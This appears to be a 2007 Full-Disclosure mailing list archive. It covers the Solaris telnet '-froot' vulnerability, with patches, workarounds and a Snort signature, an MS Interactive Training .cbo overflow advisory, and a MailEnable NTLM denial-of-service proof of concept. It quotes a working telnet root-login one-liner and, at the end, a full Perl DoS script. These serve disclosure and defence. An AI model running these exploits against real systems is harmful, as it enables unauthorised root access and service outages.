relevant to their specific system configuration:

http://corporate.secunia.com/

Secunia also provides a publicly accessible and comprehensive advisory
database as a service to the security community and private 
individuals, who are interested in or concerned about IT-security.

http://secunia.com/

Secunia believes that it is important to support the community and to
do active vulnerability research in order to aid improving the 
security and reliability of software in general:

http://corporate.secunia.com/secunia_research/33/

Secunia regularly hires new skilled team members. Check the URL below
to see currently vacant positions:

http://secunia.com/secunia_vacancies/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/secunia_security_advisories/ 

== 
10) Verification 

Please verify this advisory by visiting

Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Casper . Dik

>> The simplest possible fix on such short notice:
>> 
>> http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c
?r2=3629&r1=2923
>> 
>> Casper
>
>
>How about just uncommenting the following from /etc/default/login
>
># If CONSOLE is set, root can only login on that device.
># Comment this line out to allow remote login by root.
>#
>CONSOLE=/dev/console
>
>Not a fix to be sure, but at least prevents a remote login.

That is the default; and preventing root logins does not prevent
other logins.

"svcadm disable telnet" is the best fix (and there's really no
reason to enable it)

Casper

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Adrian Sanabria

If someone was going to plant a backdoor in Solaris, don't you think they
would have chosen a service that most people would leave turned on? The only
way I can see someone choosing telnet for a backdoor is if it happened a
long time ago. So, two things I'm curious about, but too busy (lazy) at
the moment to look up:

1. Didn't Sun open up the source to Solaris? I wonder if it looks more like
a bug or a backdoor in the source.
2. Did this get reintroduced to Solaris, or has it been there ever since the
legacy code was pulled over from SysV?

--Adrian

P.S. - Apologies if this was answered somewhere, and I missed it.


On 2/13/07, Gadi Evron <[EMAIL PROTECTED]> wrote:


On Mon, 12 Feb 2007, Oliver Friedrichs wrote:
>
> Am I missing something?  This vulnerability is close to 10 years old.
> It was in one of the first versions of Solaris after Sun moved off of
> the SunOS BSD platform and over to SysV.  It has specifically to do with
> how arguments are processed via getopt() if I recall correctly.

Hey Oliver! :)

Well than, I guess it just became new again. And to be honest, I have to
agree with a previous poster and suspect (only suspect) it could somehow
be a backdoor rather than a bug.

The reason why this vulnerability is so critical is the number of networks
and organizations which rely on Solaris for critical production servers,
as well as use telnet for internal communication on their LAN (now how
smart is that? I'd rather use telnet on the Internet than on a local LAN).

Further, there are quite a few third party appliances (some
infrastructure back-end) that can not easily be patched running on
Solaris (forget fuzzing or VA, people never even NMAP appliances they
buy).

I am unsure of how long we will see this in to-do items of corporate
security teams around the world, but I am sure Sun's /8 is getting a lot
of action recently.

>
> Oliver

Gadi.

>
> -Original Message-
> From: Gadi Evron [mailto:[EMAIL PROTECTED]
> Sent: Sunday, February 11, 2007 10:01 PM
> To: bugtraq@securityfocus.com
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Solaris telnet vulnberability - how many on your network?
>
> Johannes Ullrich from the SANS ISC sent this to me and then I saw it on
> the DSHIELD list:
>
> 
> If you run Solaris, please check if you got telnet enabled NOW. If
> you
> can, block port 23 at your perimeter. There is a fairly trivial
> Solaris telnet 0-day.
>
> telnet -l "-froot" [hostname]
>
> will give you root on many Solaris systems with default installs
> We are still testing. Please use our contact form at
> https://isc.sans.org/contact.html
> if you have any details about the use of this exploit.
> 
>
> You mean they still use telnet?!
>
> Update from HD Moore:
> "but this bug isnt -froot, its -fanythingbutroot =P"
>
> On the exploits@ mailing list and on DSHIELD this vulnerability was
> verified as real.
>
> If Sun doesn't yet block port 23/tcp incoming on their /8, I'd make it a
> strong suggestion.
>
> Anyone else running Solaris?
>
>   Gadi.
>
>


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

[Full-disclosure] Solaris telnet vuln solutions digest and network risks

2007-02-14 Thread Gadi Evron
A couple of updates and a summary digest of useful information shared from
all around on this vulnerability, for those of us trying to make sense of
what it means to our networks:

1. Sun released a patch (although it is not a final one). It can be found
on their site ( http://sunsolve.sun.com/tpatches - thanks to Casper Dik of
Sun, for those who have been following the discussion).

To quote: "the simplest possible fix on such short notice":
http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923

2. If you haven't already, I strongly recommend checking your network for
machines running telnet, and more specifcially, vulnerable to this
particular issue.

Several folks are speaking of third-party appliances running on Solaris,
as well as some back-end VoIP devices that have been confirmed as
vulnerable.

Apparently, telnet returns a different answer when this vulnerability is
used. We are not sure yet, but Noam Rathaus brought up the option that it
looks like the client responds with a "Won't Authentication Option" to the
server's "Do Authentication Option". This could perhaps be used to
actively detect the "attack".

3. If this solution is viable for you and you haven't already, ACLing
23/tcp at the border or from your user space may not be a bad idea, if it
won't kill anything. At least for now.

4. Bleeding Edge (ex Bleeding Snort) released snort signatures for this:
http://www.bleedingthreats.net/index.php/2007/02/12/solaris-remote-telnet-root-exploit-signature/

Quoting:

Chris Byrd has submitted an accurate signature for the exploit.
# Submitted 2007-02-12 by Chris Byrd
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:.BLEEDING-EDGE EXPLOIT
Solaris telnet USER environment
vuln.; flow:to_server,established; content: .|ff fa 27 00 00 55 53 45 52
01 2d
66|.; rawbytes; classtype:attempted-user; 
reference:url,riosec.com/solaris-telnet-0-day; sid:2003411; rev:1;)


4. An analysis of how this vulnerability works can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

And blogs by Sun on how this happened and was fixed (thanks to Georg
Oppenberg):
http://blogs.sun.com/tpenta/entry/the_in_telnetd_vulnerability_exploit
http://blogs.sun.com/danmcd/entry/how_opensolaris_did_its_job

And a fine explanation by Casper Dik on Bugtraq:
http://seclists.org/bugtraq/2007/Feb/0205.html

5. Apparently, this is the same vulnerability in 'login' that was in AIX
in 1994:
http://www.cert.org/advisories/CA-1994-09.html
http://osvdb.org/displayvuln.php?osvdb_id=1007

6. Vulnerable systems: reports are unclear, some or all of Solaris 10. No
earlier versions of Solaris/SunOS are vulnerable.

6. Other workarounds exist. Brad Powell suggested on Full-Disclosure:

Quoting:

For root login; there is a setting in /etc/default/login. If CONSOLE is
set, then root can only login on that device
i.e. "CONSOLE=/dev/ttya" means "root" can only login on ttya device. Any
other user via telnet/ssh/whatever has to login as themselves and "su" to
root.

This doesn't prevent telnet -l "-fbin", or -flp; for those accounts best
bet is to change /etc/passwd for the shell of system-account users to
/sbin/noshell or /bin/false (noshell just logs the entry and exists)

Of course disabling in.telnetd in /etc/inetd.conf (and doing a pkill -HUP
inetd) if possible is a safe bet,
but some sites are forced to use telnetd. 


Background:

The original post on this, with the "exploit", can be found here:
http://www.com-winner.com/0day_was_the_case_that_they_gave_me.pdf

A bit of background:
http://blogs.securiteam.com/index.php/archives/814

And some on how corporations responded as we saw from our own client base:
http://blogs.securiteam.com/index.php/archives/819

Opinion:

Whatever my thoughts are on how silly, sad or funny this vulnerability is
(quaint really), how they use telnet (?!) and how Sun should be smacked on
the back of the head for it, I have to honestly admit Sun's response and
the level they were open to the community and industry on this without
too many PR/legal blocks getting in their way are very encouraging,
releasing information on the vulnerability, how it happened and why, a
quick beta patch and even discussing openly on mailing lists.
I am in awe. Now it is time for others to follow their example.

This one, despite its simplicity and age is going to be with us for a
while.

Gadi Evron.


___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Solaris telnet vulnberability - how many on your network?

2007-02-14 Thread Joe Shamblin
[EMAIL PROTECTED] wrote:
>> On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
 On Tue, 13 Feb 2007 [EMAIL PROTECTED] wrote:
>> Am I missing something?  This vulnerability is close to 10 years old.
>> It was in one of the first versions of Solaris after Sun moved off of
>> the SunOS BSD platform and over to SysV.  It has specifically to do w=
>> ith
>> how arguments are processed via getopt() if I recall correctly.
> You're confused with AIX/Linux
>
> Solaris did not have the -f option in login until much later.
 Hi Casper. While we have you here, any idea on when Sun will be patching
 this issue?
>>> Now, follow the links from http://sunsolve.sun.com/tpatches
>>>
>>> Casper
>>>
>> Many thanks Casper! Can you give some more information on exactly what is
>> patched. Any Sun released advisory?
> 
> 
> The simplest possible fix on such short notice:
> 
> http://cvs.opensolaris.org/source/diff/onnv/onnv-gate/usr/src/cmd/cmd-inet/usr.sbin/in.telnetd.c?r2=3629&r1=2923
> 
> Casper


How about just uncommenting the following from /etc/default/login

# If CONSOLE is set, root can only login on that device.
# Comment this line out to allow remote login by root.
#
CONSOLE=/dev/console

Not a fix to be sure, but at least prevents a remote login.

Joe
-- 
Joe Shamblin[EMAIL PROTECTED]
Senior Systems Administrator Department of Computer Science
(919) 660-6582  Duke University

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Solaris telnet vulnberability - how many onyour network?

2007-02-14 Thread Gadi Evron
On Tue, 13 Feb 2007, Peter Ferrie wrote:
> > I have to agree with a previous poster and suspect (only 
> > suspect) it could somehow be a backdoor rather than a bug.
> 
> Reminds me of the WMF SetAbortProc() "backdoor" accusation.
> :-) It was just bad design.
> 

You know what? As unlikely as we agreed this is, with WMF, they deserved
the accusation. :o)

Gadi.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MS Interactive Training .cbo Overflow

2007-02-14 Thread Brett Moore

= MS Interactive Training .cbo Overflow
=
= MS Bulletin posted: 
= http://www.microsoft.com/technet/security/bulletin/MS07-005.mspx
=
= Affected Software:
=Microsoft Windows 2000
=Microsoft Windows XP  
=Microsoft Windows Server 2003
=
= Public disclosure on February 14, 2007


== Overview ==

When thinking about buffer overflow vulnerabilities, a file can
sometimes
be as harmful as a packet. Even though past security issues have taught
us that it is unwise to use a string from a file/packet without first
checking its length, this is what happened here.

MS Interactive Training will open a file with a .cbo extension and read 
in the Syllabus details.

Through the creation of a corrupt file, with a long Syllabus string it
is 
possible to gain control of EIP and execute arbitrary code.

== Exploitation ==

Remote exploitation through Internet Explorer can be obtained through 
hosting a malicious .cbo file which will be downloaded and opened 
automatically.

== Solutions ==

- Install the vendor supplied patch.

== Credit ==

Discovered and advised to Microsoft May, 2006 by Brett Moore of
Security-Assessment.com

== About Security-Assessment.com ==

Security-Assessment.com is Australasia's leading team of Information 
Security consultants specialising in providing high quality Information 
Security services to clients throughout the Asia Pacific region. Our 
clients include some of the largest globally recognised companies in 
areas such as finance, telecommunications, broadcasting, legal and 
government. Our aim is to provide the very best independent advice and 
a high level of technical expertise while creating long and lasting 
professional relationships with our clients.

Security-Assessment.com is committed to security research and 
development, and its team continues to identify and responsibly publish 
vulnerabilities in public and private software vendor's products. 
Members of the Security-Assessment.com R&D team are globally recognised 
through their release of whitepapers and presentations related to new 
security research.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


[Full-disclosure] MailEnable DoS POC

2007-02-14 Thread mu-b
The POC attached exploits an out of bounds memory read in the NTLM 
authentication
routines of MailEnable Pro/Enterprise. The problem lies in the NTLM_UnPack_Type3
function of MENTLM.dll.

This appears to have been silently "patched" somewhere between versions 2.351 
and
2.36-7. (observe the quotes).

(c34.dc0): Access violation - code c005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=8146930b ebx=003a6cc8 ecx=0040 edx= esi=8146920b edi=0146b238
eip=0109b4b3 esp=014691e4 ebp=014691ec iopl=0 nv up ei pl nz ac po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs= efl=00010212
MENTLM!NTLM_UnPack_Type3+0x3019:
0109b4b3 f3a5rep movs dword ptr es:[edi],dword ptr [esi] 
es:0023:0146b238= ds:0023:8146920b=

---
([EMAIL PROTECTED])
#!/usr/bin/perl
#
# maildisable-v5.pl
#
# Mail Enable Professional/Enterprise <=v2.35 (win32)
# by mu-b - Wed Nov 29 2006
#
# - Tested on: Mail Enable Professional v2.32 (win32) - with HOTFIX
#  Mail Enable Professional v2.33 (win32)
#  Mail Enable Professional v2.34 (win32)
#  Mail Enable Professional v2.35 (win32)
#
# out of bounds read == DoS
#


use Getopt::Std; getopts('t:', \%arg);
use Socket;
use MIME::Base64;

&print_header;

my $target;

if (defined($arg{'t'})) { $target = $arg{'t'} }
if (!(defined($target))) { &usage; }

my $imapd_port = 143;
my $send_delay = 2;

my $PAD = 'A';

if (connect_host($target, $imapd_port)) {
print("-> * Connected\n");
send(SOCKET, "1 AUTHENTICATE NTLM\r\n", 0);
sleep($send_delay);

$buf = ($PAD x 12).
   "\xfa\xff\xff\xff".
   ($PAD x 12);
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);

$buf = ($PAD x 28).
   "\x00\x01".
   ($PAD x 2).
   "\xef\xbe\xad\xde";
send(SOCKET, encode_base64($buf)."\r\n", 0);
sleep($send_delay);

print("-> * Successfully sent payload!\n");
}

sub print_header {
print("MailEnable Pro <=v2.36 DoS POC\n");
print("by: <[EMAIL PROTECTED]>\n\n");
}

sub usage {
  print(qq(Usage: $0 -t 

 -t : hostname to test
));

exit(1);
}

sub connect_host {
($target, $port) = @_;
$iaddr  = inet_aton($target) || die("Error: $!\n");
$paddr  = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto  = getprotobyname('tcp')  || die("Error: $!\n");

socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr)  || die("Error: $!\n");
return(1338);
}
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/